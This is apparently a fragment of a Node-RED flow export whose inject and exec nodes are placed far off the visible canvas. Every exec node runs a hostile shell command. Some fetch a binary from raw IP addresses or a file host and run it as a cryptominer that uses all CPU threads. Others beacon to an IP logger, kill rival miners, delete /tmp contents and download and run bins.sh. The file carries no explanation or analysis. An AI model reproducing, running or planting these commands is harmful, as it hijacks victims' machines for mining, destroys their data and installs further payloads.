        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl http://82.153.138.214:42069/xs > /tmp/xs; chmod +x /tmp/xs; nohup bash /tmp/xs --cpu-no-yield --cpu-priority 5 --donate-level 0 -a rx/0 -t $(nproc) -o 185.216.71.153:3333 -k --tls -B &> /dev/null",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl http://82.153.138.214:42069/xs > /tmp/xs; chmod +x /tmp/xs; /tmp/xs -o 185.216.71.153:3333",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl http://185.216.71.153:42069/xs > /tmp/xs; chmod +x /tmp/xs; /tmp/xs --cpu-no-yield --cpu-priority 5 --donate-level 0 -a rx/0 -t $(nproc) -o 185.216.71.153:3333 -k --tls -B &> /dev/null",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl https://files.catbox.moe/o1nl0n > /tmp/xs; chmod +x /tmp/xs; /tmp/xs -o 185.216.71.153:3333 -a rx/0 -t $(nproc) -k",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl https://iplogger.com/2ThQh5",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "pkill xs -9 && pkill xmrig -9 && cd /tmp/ && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && rm -rf * && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "cd /tmp/ && rm -rf * && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl https://iplogger.com/2TZ8j5 && cd /tmp/ && rm -rf * && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl https://iplogger.com/2TZ8j5 && cd /tmp/ && rm -rf * && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl https://iplogger.com/2TZ8j5 && cd /tmp/ && rm -rf * && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 99999,
        "y": 99999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 99999,
        "y": 99999,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    },
    {
        "id": "04e9bf59d127ed59",
        "type": "exec",
        "z": "7c816d41.c6de64",
        "command": "curl https://iplogger.com/2TZ8j5 && cd /tmp/ && rm -rf * && curl -O http://185.216.71.153/bins/bins.sh && chmod +x bins.sh && sh bins.sh",
        "addpay": "payload",
        "append": "",
        "useSpawn": "false",
        "timer": "10080",
        "winHide": false,
        "oldrc": false,
        "name": "",
        "x": 9999,
        "y": 9999,
        "wires": [
            [],
            [],
            []
        ]
    },
    {
        "id": "213d0c20572925ff",
        "type": "inject",
        "z": "7c816d41.c6de64",
        "name": "",
        "props": [
            {
                "p": "payload"
            },
            {
                "p": "topic",
                "vt": "str"
            }
        ],
        "repeat": "",
        "crontab": "",
        "once": false,
        "onceDelay": 0.1,
        "topic": "",
        "payload": "",
        "payloadType": "date",
        "x": 9999,
        "y": 9990,
        "wires": [
            [
                "04e9bf59d127ed59"
            ]
        ]
    }
]